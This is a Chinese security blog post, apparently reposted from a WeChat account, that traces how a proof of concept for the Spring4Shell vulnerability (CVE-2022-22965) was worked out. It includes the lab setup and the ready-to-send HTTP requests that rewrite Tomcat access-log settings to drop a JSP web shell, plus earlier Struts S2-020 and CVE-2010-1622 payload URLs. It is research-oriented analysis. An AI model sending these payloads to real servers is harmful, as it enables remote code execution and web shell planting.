0x00 前言

相信大家对Spring4Shell (CVE-2022-22965)漏洞已经比较熟悉了，网上也有不少师傅的分析文章，这篇就尝试还原一下从漏洞情报到POC构造的过程。

0x01 前期情报

3月29日，外网某社交平台发布了spring的漏洞预警

影响范围：JDK>=9，使用了spring框架或衍生版本，且为0day

下午小范围传出加固方法：

漏洞位置在spring-beans-*.jar，具体文件为CachedIntrospectionResults，waf防护规则为过滤class.*，Class.*，*.class.*，*.Class.*。

临时解决方案：全局搜索@InitBinder  在dataBinder.setDisallowedFields方法中添加class.*，Class.*，*.class.*，*.Class.*。

0x02 漏洞分析

1、信息收集

关键字搜索 “CachedIntrospectionResults 漏洞”搜索到历史漏洞CVE-2010-1622。

获取到关键信息：

由于java bean的内省机制，导致变量覆盖问题，利用入口为对象的表单绑定。

参考历史漏洞查看源码289行可以看到，注释提示classloader与ProtectionDomain黑名单,也就是class.classloader或class.protectiondomain的形式会认为是非法，不进行赋值。

跟classloader相关的漏洞很容易想到s2-20漏洞，以s2-20 classloader为关键字搜索找到这篇文章

文章讲到了利用classloader获取当前上下文的变量，通过变量覆盖来tomcat8的日志记录参数 getshell，还给出了自动枚举的jsp脚本。

到这里我们基本收集到了漏洞点与漏洞利用途径的基本信息，由于漏洞情报中提到jdk9，只需搭建环境调试代码踩坑即可。

2、漏洞环境搭建

从https://start.spring.io/，创建一个spring boot项目，导入idea，JDK选jdk11

注意在pom.xml中改一下版本

<dependency>  <groupId>org.springframework</groupId>  <artifactId>spring-beans</artifactId>  <version>5.3.17</version></dependency>

新建java bean User类

public class User {    private String name;    private String password;            public User() {    }        public User(String name, String password) {        this.name = name;        this.password = password;    }    public String getName() {        return name;    }        public void setName(String name) {        this.name = name;    }        public String getPassword() {        return password;    }        public void setPassword(String password) {        this.password = password;    }        }

新建controller类，指定参数绑定

@RestControllerpublic class HelloController {    @RequestMapping("/user")    //指定User参数来接收前端的绑定    public String test(User u){        System.out.println(u.getName());        //System.out.println(u.getClass().getClassLoader())        return "Hello feisec!";    }}

环境搭建完成，能成功访问即可

3、踩坑与猜想

先看历史漏洞的利用方式

在CVE-2010-1622中的利用(控制classLoader的参数，限制较多)：

http://localhost:8088/hello?class.classLoader.URLs[0]=jar:http://127.0.0.1:8000/exp.jar!/

S2-20的利用(控制tomcat日志写shell)：

http://127.0.0.1/struts2-blank/example/HelloWorld.action?class.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT
http://127.0.0.1/struts2-blank/example/HelloWorld.action?class.classLoader.resources.context.parent.pipeline.first.prefix=shell
http://127.0.0.1/struts2-blank/example/HelloWorld.action?class.classLoader.resources.context.parent.pipeline.first.suffix=.jsp
http://127.0.0.1/struts2-blank/example/HelloWorld.action?class.classLoader.resources.context.parent.pipeline.first.fileDateFormat=1

根据上面的利用方法我们优先使用s2-20的利用方法，先找到当前bean的的classloader，参考controller代码，加入打印classloader，springboot jar包运行，发现ClassLoader是AppClassLoader，不存在无参的getResources方法不能用s2-20的利用方法（坑点1）

//console输出结果
jdk.internal.loader.ClassLoaders$AppClassLoader@2437c6dc

换tomcat9，war包部署，输出为

ParallelWebappClassLoader
  context: ROOT
  delegate: false
----------> Parent Classloader:
java.net.URLClassLoader@478190fc

Controller中添加如下代码方便调试（坑点2，idea需要强转ParallelWebappClassLoader，才可以提示到，当然也可以用信息收集的那个jsp来自动找链）

ParallelWebappClassLoader cl = (ParallelWebappClassLoader) u.getClass().getClassLoader();
System.out.println(cl);

下断点，利用idea 的代码提示功能来探索可能的利用信息，重点看无参的get与set方法，发现了getModule()，搜索一下发现是jdk9加入的模块化，与情报相符

到这里CVE-2010-1622的黑名单已经绕过了，利用s2-20 tomcat下的利用方式来进行变量覆盖，那么尝试构造一个poc

4、poc构造

POST /user HTTP/1.1
Host: 127.0.0.1:8090
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36 Edg/100.0.1185.44
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
xxx: test
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-US;q=0.7
Connection: close
Content-Length: 412

class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.directory=./webapps/ROOT/&class.module.classLoader.resources.context.parent.pipeline.first.prefix=shell&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat=1

坑点：必须指定Content-Type: application/x-www-form-urlencoded

发包后浏览器访问http://127.0.0.1/user?name=<%Runtime.getRuntime().exec("calc");%>

再次调试执行表达式，发现日志记录的参数已被覆盖，jsp文件也已经生成

但是还存在一个问题，shell的内容不对，get请求恶意参数会被url编码，这就尴尬了

怎么控制内容，还得从可控参数上找，看官方文档或搜索tomcat access log配置，发现pattern可以从headers和cookie中获取值，这样就可以解决编码的问题了。

最后的poc:

POST /user HTTP/1.1
Host: 127.0.0.1:8090
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36 Edg/100.0.1185.44
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
xxx: test
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-US;q=0.7
Connection: close
Content-Length: 412

class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bxxx%7Di&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.directory=./webapps/ROOT/&class.module.classLoader.resources.context.parent.pipeline.first.prefix=shell&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat=1

验证生产的shell

没毛病！

0x03 总结

1、Spring4Shell漏洞是一个典型的历史漏洞结合组合拳加新技术黑名单绕过的洞

2、只要当前容器有可控的无参的get、set链就可以有新的利用方法

原文始发于微信公众号（云见安全）：Spring4Shell 从漏洞情报到POC构造